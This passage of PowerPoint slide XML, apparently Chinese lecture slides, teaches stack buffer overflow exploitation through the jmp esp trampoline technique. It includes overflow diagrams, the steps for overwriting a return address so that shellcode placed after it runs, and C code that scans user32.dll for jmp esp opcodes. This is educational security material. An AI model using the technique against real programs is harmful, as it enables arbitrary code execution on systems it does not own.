        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10225503" y="4297286"/>
            <a:ext cx="333746" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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81" name="文本框 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24360F15-D3B1-8FD1-24F1-397FB4ED06F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7697858" y="4680900"/>
            <a:ext cx="572593" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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nop</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="文本框 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832DBB80-8D63-4176-6CBC-0C3D48CD9A7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709491" y="4307658"/>
            <a:ext cx="572593" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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nop</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="文本框 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB40C819-36E5-66AB-F5EC-1F68F835B0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7723187" y="3887723"/>
            <a:ext cx="572593" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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nop</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="文本框 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DEF8D18-7FF4-28A3-7D8B-99FE1C5DE34C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7413296" y="2730451"/>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
        <p:nvSpPr>
          <p:cNvPr id="85" name="文本框 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{907B0385-D9F0-DF3B-4A95-DEBC12CD9DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7453080" y="2346874"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{577A4EDB-5A40-AB8E-6326-5A5601A334B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7427753" y="1969024"/>
            <a:ext cx="1112805"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shellcode</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88" name="肘形连接符 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4412E549-1F16-6353-BFB1-DDE09E8E7DD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="56" idx="3"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8717370" y="3666463"/>
            <a:ext cx="998238" cy="439821"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B7E0B64-068A-E28F-71AD-39F58FC1E978}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="53" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9650870" y="3286147"/>
            <a:ext cx="1418273" cy="820137"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -16118"/>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89527F6D-1E98-75B1-B3B7-713F5BA7FCA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="773943" y="1052513"/>
            <a:ext cx="5111750" cy="5256212"/>
            <a:chOff x="623888" y="1052513"/>
            <a:chExt cx="5111750" cy="5256212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42207102-A4A2-DB7E-7FE5-DA6938C51103}"/>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DC475453-3828-B2BF-4ECE-6B2A8331FC93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="762518" y="1148219"/>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溢出前</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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF7F5B59-439C-773A-C790-02D4A73D379D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6313488" y="1058913"/>
            <a:ext cx="5111750" cy="5249811"/>
            <a:chOff x="623888" y="1052513"/>
            <a:chExt cx="5111750" cy="5249811"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70BE54F4-80E0-C858-4EFF-059B185355EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="623888" y="10525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文本框 98">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{013E5664-70D5-A5FA-077F-7560E85471D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="767495" y="1141819"/>
              <a:ext cx="110799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溢出后</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674242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基于跳板指令的地址定位技术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具体步骤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5590"/>
            <a:ext cx="4824536"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第一步，找到内存中任意一个汇编指令</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这条指令执行后可跳转到</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寄存器保存的地址，下面准备在溢出后将这条指令的地址覆盖返回地址。</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第二步，设计好缓冲区溢出漏洞利用程序中的输入数据，使缓冲区溢出后，前面的填充内容为任意数据，紧接着覆盖返回地址的是</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指令的地址，再接着覆盖与返回地址相邻的高地址位置并写入</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具体步骤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699190"/>
            <a:ext cx="4824536"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第三步，函数调用完成后函数返回，根据返回地址中指向的</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指令的地址去执行</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操作，即跳转到</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寄存器中保存的地址，而函数返回后</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中保存的地址是与返回地址相邻的高地址位置，在这个位置保存的是</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代码，则</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代码被执行。</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65993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基于跳板指令的地址定位技术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查找跳板指令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0369" y="1705590"/>
            <a:ext cx="4824536"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上述方法使用</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指令做为跳板，实现了在栈帧动态分配的情况下，可以自动跳回</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的地址并执行。</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对于查找</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的指令地址，可以在系统常用的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user32.dll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等动态链接库，或者其他被所有程序都加载的模块中查找，这些动态链接库或者模块加载的基地址始终是固定的。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其他可用指令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699190"/>
            <a:ext cx="4824536" cy="121129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除了</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之外，</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mov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eax,esp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和</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jmp</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eax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等指令序列也可以实现进入栈区的功能。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="702694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基于跳板指令的地址定位技术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66762" y="1692076"/>
            <a:ext cx="5403119" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HINSTANCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> handle = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>LoadLibraryA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">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"user32.dll"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>BOOL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN"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done_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6F008A"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>FALSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> (!handle){</a:t>
            </a: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00"/>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"load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> error!"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A31515"/>
              </a:solidFill>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>BYTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN"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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>BYTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>*)handle;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">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"start at 0x%x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, handle);</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">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 position=0; !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>done_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>; position++){</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try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>{</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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>[position]==0xFF&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>[position+1]==0xE4){</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 address = (</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> + position;</a:t>
            </a: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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> found at 0x%x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, address);</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A31515"/>
              </a:solidFill>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a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(...){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>            </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 address = (</a:t>
            </a:r>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> + position;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
